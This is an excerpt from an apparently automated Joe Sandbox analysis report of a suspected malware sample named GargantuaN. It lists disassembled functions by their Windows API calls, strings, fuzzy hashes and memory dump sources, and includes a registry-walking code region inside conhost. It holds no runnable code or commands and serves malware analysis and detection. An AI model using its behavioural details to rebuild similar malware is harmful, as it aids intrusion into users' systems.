                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00D76CBE,?), ref: 00D7CA70
                                                        • __freea.LIBCMT ref: 00D7CA79
                                                          • Part of subcall function 00D78E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D7CA2C,00000000,?,00D76CBE,?,00000008,?,00D791E0,?,?,?), ref: 00D78E38
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                        • String ID:
                                                        • API String ID: 2652629310-0
                                                        • Opcode ID: 84c0a8832f7cbd910ad19124959d0e15f1d09ddc750f0d3c9b94d3b66241b288
                                                        • Instruction ID: b9fcca041b7b877b0dae3cd3110f7ce1acea3bbb54e568557d9393167f9308e4
                                                        • Opcode Fuzzy Hash: 84c0a8832f7cbd910ad19124959d0e15f1d09ddc750f0d3c9b94d3b66241b288
                                                        • Instruction Fuzzy Hash: 8631B072A2021AAFDF25DF64DC45DAE7BA5EB41711B18812CFC08E6250EB35CD50CBB0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetDC.USER32(00000000), ref: 00D6A666
                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00D6A675
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D6A683
                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00D6A691
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: CapsDevice$Release
                                                        • String ID:
                                                        • API String ID: 1035833867-0
                                                        • Opcode ID: 1f04ac6ee063a7420b0a748d9cc1be7fd8033c3b1d177925fa343af91f2542b3
                                                        • Instruction ID: 43fd217eee8bc7ea9b81f2979a5607a7be9463addb965e4df6481c9435690a14
                                                        • Opcode Fuzzy Hash: 1f04ac6ee063a7420b0a748d9cc1be7fd8033c3b1d177925fa343af91f2542b3
                                                        • Instruction Fuzzy Hash: C3E0EC31942B22E7D6616F64AD0DB8A3E64AF16F52F050212FA05E6390DB6486009BB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00D6A699: GetDC.USER32(00000000), ref: 00D6A69D
                                                          • Part of subcall function 00D6A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00D6A6A8
                                                          • Part of subcall function 00D6A699: ReleaseDC.USER32(00000000,00000000), ref: 00D6A6B3
                                                        • GetObjectW.GDI32(?,00000018,?), ref: 00D6A83C
                                                          • Part of subcall function 00D6AAC9: GetDC.USER32(00000000), ref: 00D6AAD2
                                                          • Part of subcall function 00D6AAC9: GetObjectW.GDI32(?,00000018,?), ref: 00D6AB01
                                                          • Part of subcall function 00D6AAC9: ReleaseDC.USER32(00000000,?), ref: 00D6AB99
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: ObjectRelease$CapsDevice
                                                        • String ID: (
                                                        • API String ID: 1061551593-3887548279
                                                        • Opcode ID: 6f463a9c3ae017dcdbd5a72fedde51e5878ad32f0ee8c1889cc61d7c33cbce5d
                                                        • Instruction ID: 89df308f017fb9e95450f07a90774691b300e5add64cbede257ce55b38370f98
                                                        • Opcode Fuzzy Hash: 6f463a9c3ae017dcdbd5a72fedde51e5878ad32f0ee8c1889cc61d7c33cbce5d
                                                        • Instruction Fuzzy Hash: E691D0B1608355AFD610DF69C844A2BBBE8FFC9700F00495EF59AD3260DB30A945CF62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00D575E3
                                                          • Part of subcall function 00D605DA: _wcslen.LIBCMT ref: 00D605E0
                                                          • Part of subcall function 00D5A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00D5A598
                                                        • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D5777F
                                                          • Part of subcall function 00D5A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00D5A325,?,?,?,00D5A175,?,00000001,00000000,?,?), ref: 00D5A501
                                                          • Part of subcall function 00D5A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00D5A325,?,?,?,00D5A175,?,00000001,00000000,?,?), ref: 00D5A532
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                        • String ID: :
                                                        • API String ID: 3226429890-336475711
                                                        • Opcode ID: 4674f984e2525b7dea212fdff87a4ca71e16d4abf82606aae60f17d8c4028467
                                                        • Instruction ID: 428a2d596026a7df3c35664d35dfa2e36a85494d11c580407e75efd7aeecff5a
                                                        • Opcode Fuzzy Hash: 4674f984e2525b7dea212fdff87a4ca71e16d4abf82606aae60f17d8c4028467
                                                        • Instruction Fuzzy Hash: 22416F71801168AAEF25EB64DC55EEEB778EF45301F104096BE09A3092DB749F8CCB71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: _wcslen
                                                        • String ID: }
                                                        • API String ID: 176396367-4239843852
                                                        • Opcode ID: 22c6e507616556e042bd7d31f8911065f107cd2ad271cf3a878ee287c6e3ce39
                                                        • Instruction ID: 8eb3b72ae3fbf8a69a7d95792d955595f916df96ec4dd2933734d972c6deac90
                                                        • Opcode Fuzzy Hash: 22c6e507616556e042bd7d31f8911065f107cd2ad271cf3a878ee287c6e3ce39
                                                        • Instruction Fuzzy Hash: DF2181729043165BD731EA64D845AAAB3ECDF91764F18082BF545C3142FB65E98883B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00D5F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00D5F2E4
                                                          • Part of subcall function 00D5F2C5: GetProcAddress.KERNEL32(00D981C8,CryptUnprotectMemory), ref: 00D5F2F4
                                                        • GetCurrentProcessId.KERNEL32(?,?,?,00D5F33E), ref: 00D5F3D2
                                                        Strings
                                                        • CryptUnprotectMemory failed, xrefs: 00D5F3CA
                                                        • CryptProtectMemory failed, xrefs: 00D5F389
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$CurrentProcess
                                                        • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                        • API String ID: 2190909847-396321323
                                                        • Opcode ID: 5455bfab9769c5b6c4b2a5e188a457f2f59ad81c5fcee82b86a599973535b405
                                                        • Instruction ID: 251a1152865813dee9902408b25455c5eba3681050b877348d7d1bc4d7e4950c
                                                        • Opcode Fuzzy Hash: 5455bfab9769c5b6c4b2a5e188a457f2f59ad81c5fcee82b86a599973535b405
                                                        • Instruction Fuzzy Hash: 4C11D031A01329ABFF15AF24DC45A6E3B54EF01B62B08412AFC45AF351DA74DE4987B4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • _swprintf.LIBCMT ref: 00D5B9B8
                                                          • Part of subcall function 00D54092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D540A5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: __vswprintf_c_l_swprintf
                                                        • String ID: %c:\
                                                        • API String ID: 1543624204-3142399695
                                                        • Opcode ID: 47d537f10707affc4ad7c242dcb7bc46f21cf2d316a8e1c2d3a1ad465121f82b
                                                        • Instruction ID: e6e5a39736be9692f97131dc6fd860aba9b43da224405e6fd587d8aef4a5cb9e
                                                        • Opcode Fuzzy Hash: 47d537f10707affc4ad7c242dcb7bc46f21cf2d316a8e1c2d3a1ad465121f82b
                                                        • Instruction Fuzzy Hash: A701F56350031169DE30AB358C42D7BA7ACEF91771B54850FFD48D7082FB60D84887B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateThread.KERNEL32(00000000,00010000,00D61160,?,00000000,00000000), ref: 00D61043
                                                        • SetThreadPriority.KERNEL32(?,00000000), ref: 00D6108A
                                                          • Part of subcall function 00D56C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D56C54
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: Thread$CreatePriority__vswprintf_c_l
                                                        • String ID: CreateThread failed
                                                        • API String ID: 2655393344-3849766595
                                                        • Opcode ID: 2feda90b20498319e5413f23055a39277e5a745beed55136204a819b62d4c07a
                                                        • Instruction ID: 7782a0cdf734b77a3a5493793c47233b25638e0d1b5fdaeb1441c0315dd7da10
                                                        • Opcode Fuzzy Hash: 2feda90b20498319e5413f23055a39277e5a745beed55136204a819b62d4c07a
                                                        • Instruction Fuzzy Hash: 6C01FE7934434A7FDB305F64DC52B767398EB40751F24042EF946D62C0CAA1A8894734
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • VirtualQuery.KERNEL32(80000000,00D6E5E8,0000001C,00D6E7DD,00000000,?,?,?,?,?,?,?,00D6E5E8,00000004,00DB1CEC,00D6E86D), ref: 00D6E6B4
                                                        • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00D6E5E8,00000004,00DB1CEC,00D6E86D), ref: 00D6E6CF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: InfoQuerySystemVirtual
                                                        • String ID: D
                                                        • API String ID: 401686933-2746444292
                                                        • Opcode ID: 6a8b7e3b037a7f1b5190702c5202b3d06a6e8b97b743c0a428e78d4aa5e42b7e
                                                        • Instruction ID: 159bd6b090741bca584ba8818d3d371ceb1614d3a55b72d91aef47ec9513a81d
                                                        • Opcode Fuzzy Hash: 6a8b7e3b037a7f1b5190702c5202b3d06a6e8b97b743c0a428e78d4aa5e42b7e
                                                        • Instruction Fuzzy Hash: D4012B766002096BDF14DE29DC09BDD7BAAEFC4724F0CC120ED19DB250E734D90587A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00D5E2E8: _swprintf.LIBCMT ref: 00D5E30E
                                                          • Part of subcall function 00D5E2E8: _strlen.LIBCMT ref: 00D5E32F
                                                          • Part of subcall function 00D5E2E8: SetDlgItemTextW.USER32(?,00D8E274,?), ref: 00D5E38F
                                                          • Part of subcall function 00D5E2E8: GetWindowRect.USER32(?,?), ref: 00D5E3C9
                                                          • Part of subcall function 00D5E2E8: GetClientRect.USER32(?,?), ref: 00D5E3D5
                                                        • GetDlgItem.USER32(00000000,00003021), ref: 00D5135A
                                                        • SetWindowTextW.USER32(00000000,00D835F4), ref: 00D51370
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                        • String ID: 0
                                                        • API String ID: 2622349952-4108050209
                                                        • Opcode ID: 6ec68feb41ef696a10b10b6762d9f1d76e809339e13f0529dff923774870fd7c
                                                        • Instruction ID: 6a5327320e88831f74c23dc2f96b8625f83826edec77ee17353c346bd61ba178
                                                        • Opcode Fuzzy Hash: 6ec68feb41ef696a10b10b6762d9f1d76e809339e13f0529dff923774870fd7c
                                                        • Instruction Fuzzy Hash: B5F04434145388FAEF151F94CC2D7E93B5DAF44386F084254FC4895A91CB75CA99EB70
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • WaitForSingleObject.KERNEL32(?,000000FF,00D61206,?), ref: 00D60FEA
                                                        • GetLastError.KERNEL32(?), ref: 00D60FF6
                                                          • Part of subcall function 00D56C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D56C54
                                                        Strings
                                                        • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00D60FFF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                        • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                        • API String ID: 1091760877-2248577382
                                                        • Opcode ID: 56c9c284bebe1c4c3b4725f27c2df953e39e42a02b2b7ee6e9cf68257a199a47
                                                        • Instruction ID: 14fec9285796483baef7cbf163b7e02894ef25b507176802156b6cbc83a4f121
                                                        • Opcode Fuzzy Hash: 56c9c284bebe1c4c3b4725f27c2df953e39e42a02b2b7ee6e9cf68257a199a47
                                                        • Instruction Fuzzy Hash: B4D05E766486317BCF103724AC0AD7E3D08DB22B72BA40714F93DA63E6CA25898557B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,?,00D5DA55,?), ref: 00D5E2A3
                                                        • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00D5DA55,?), ref: 00D5E2B1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: FindHandleModuleResource
                                                        • String ID: RTL
                                                        • API String ID: 3537982541-834975271
                                                        • Opcode ID: 191629f83c7ea76339d807d240a3ca447e1e384ed30e6a2e5647d28da1bc68c2
                                                        • Instruction ID: 61bffe44e8cac3b0b9a616e4ceff6d6da07e81243c4dd34bf19d3870a1baacda
                                                        • Opcode Fuzzy Hash: 191629f83c7ea76339d807d240a3ca447e1e384ed30e6a2e5647d28da1bc68c2
                                                        • Instruction Fuzzy Hash: 0FC012312547106BEA342B656C0DB476A585B10F11F090448B549E93D1D6A5C54487B0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1745998457.00007FF7A2251000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7A2250000, based on PE: true
                                                        • Associated: 00000002.00000002.1745972183.00007FF7A2250000.00000002.00000001.01000000.0000000A.sdmp
                                                        • Associated: 00000002.00000002.1746024729.00007FF7A225C000.00000002.00000001.01000000.0000000A.sdmp
                                                        • Associated: 00000002.00000002.1746062081.00007FF7A225F000.00000004.00000001.01000000.0000000A.sdmp
                                                        • Associated: 00000002.00000002.1746088678.00007FF7A2260000.00000008.00000001.01000000.0000000A.sdmp
                                                        • Associated: 00000002.00000002.1749013316.00007FF7A2754000.00000004.00000001.01000000.0000000A.sdmp
                                                        • Associated: 00000002.00000002.1749161971.00007FF7A278B000.00000002.00000001.01000000.0000000A.sdmp
                                                        • Associated: 00000002.00000002.1749217510.00007FF7A278E000.00000002.00000001.01000000.0000000A.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff7a2250000_GargantuanS.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                                                        • Instruction ID: b752463fdbaded6aab02adacd278ba5094f211ac24d00a60aa47dfbf79199e27
                                                        • Opcode Fuzzy Hash: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                                                        • Instruction Fuzzy Hash: 31B0923090620984E2003B11D84126962606B48740F838030C40D023BACAAD9040DB20
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:0.7%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:73
                                                        Total number of Limit Nodes:2
                                                        execution_graph (rendered graph not recoverable; node list reconstructed from the extracted edge data, addresses in the process 7 / conhost regions 000001B0BB980000 and 000001B0BB950000)
                                                        • 1b0bb981abc -> 1b0bb981628 (GetProcessHeap) -> 1b0bb981648 (__free_lconv_num) -> 1b0bb981268 (GetProcessHeap), which is called again from 1b0bb981650, 1b0bb981661 and 1b0bb98166a before 1b0bb981673
                                                        • 1b0bb981268: 1b0bb981283 GetProcessHeap -> 1b0bb9812ae __free_lconv_num; also calls 1b0bb996168
                                                        • caller loop at 1b0bb981acb: -> 1b0bb981ad2 (Sleep, SleepEx) and -> 1b0bb981598 (StrCmpIW, StrCmpW), both returning to 1b0bb981acb
                                                        • 1b0bb981628 registry walk: RegOpenKeyExW at 1b0bb98168e, 1b0bb9816c0, 1b0bb9816ff, 1b0bb98173a, 1b0bb981775, 1b0bb9817b0, 1b0bb9817eb, 1b0bb981826, 1b0bb981861; on success each open is followed by 1b0bb9812bc or 1b0bb98104c (RegQueryInfoKeyW) and RegCloseKey (1b0bb98176b, 1b0bb9817a6, 1b0bb9817e1, 1b0bb98181c, 1b0bb981857, 1b0bb981892, 1b0bb98189c); failure of the first open and the final close both reach the exit 1b0bb9818a6, which returns to 1b0bb981acb
                                                        • 1b0bb9812bc (RegQueryInfoKeyW): 1b0bb981327 GetProcessHeap, 1b0bb98133e __free_lconv_num, 1b0bb981352 RegEnumValueW, 1b0bb9813d3 GetProcessHeap, 1b0bb9813f3 GetProcessHeap HeapFree, 1b0bb98141e lstrlenW GetProcessHeap, 1b0bb981443 StrCpyW, 1b0bb981476 GetProcessHeap HeapFree, 1b0bb98148a RegCloseKey; calls 1b0bb98152c
                                                        • 1b0bb98104c (RegQueryInfoKeyW): 1b0bb9810bf __free_lconv_num, 1b0bb9810cf RegEnumValueW, 1b0bb98114e GetProcessHeap, 1b0bb98116e GetProcessHeap HeapFree, 1b0bb9811b5 RegCloseKey
                                                        • 1b0bb98152c: 1b0bb981546 -> 1b0bb98155d StrCmpIW / 1b0bb981565 StrCmpW -> 1b0bb98157c (return to 1b0bb9812bc)
                                                        • 1b0bb95273c -> 1b0bb95276a -> 1b0bb952858 LoadLibraryA (loops back to 1b0bb95276a) -> 1b0bb9528d4

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                        • String ID:
                                                        • API String ID: 1683269324-0
                                                        • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction ID: fba99c5a4152627cb9f67f4d25612b5066cae9354f3caab1e197c27b8ec105b9
                                                        • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction Fuzzy Hash: 3D111B79618E4183FB729B22FF493DB32A4EB5E3C5F90412AB94AC2595EF78C0488610
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 000001B0BB981628: GetProcessHeap.KERNEL32 ref: 000001B0BB981633
                                                          • Part of subcall function 000001B0BB981628: HeapAlloc.KERNEL32 ref: 000001B0BB981642
                                                          • Part of subcall function 000001B0BB981628: RegOpenKeyExW.ADVAPI32 ref: 000001B0BB9816B2
                                                          • Part of subcall function 000001B0BB981628: RegOpenKeyExW.ADVAPI32 ref: 000001B0BB9816DF
                                                          • Part of subcall function 000001B0BB981628: RegCloseKey.ADVAPI32 ref: 000001B0BB9816F9
                                                          • Part of subcall function 000001B0BB981628: RegOpenKeyExW.ADVAPI32 ref: 000001B0BB981719
                                                          • Part of subcall function 000001B0BB981628: RegCloseKey.ADVAPI32 ref: 000001B0BB981734
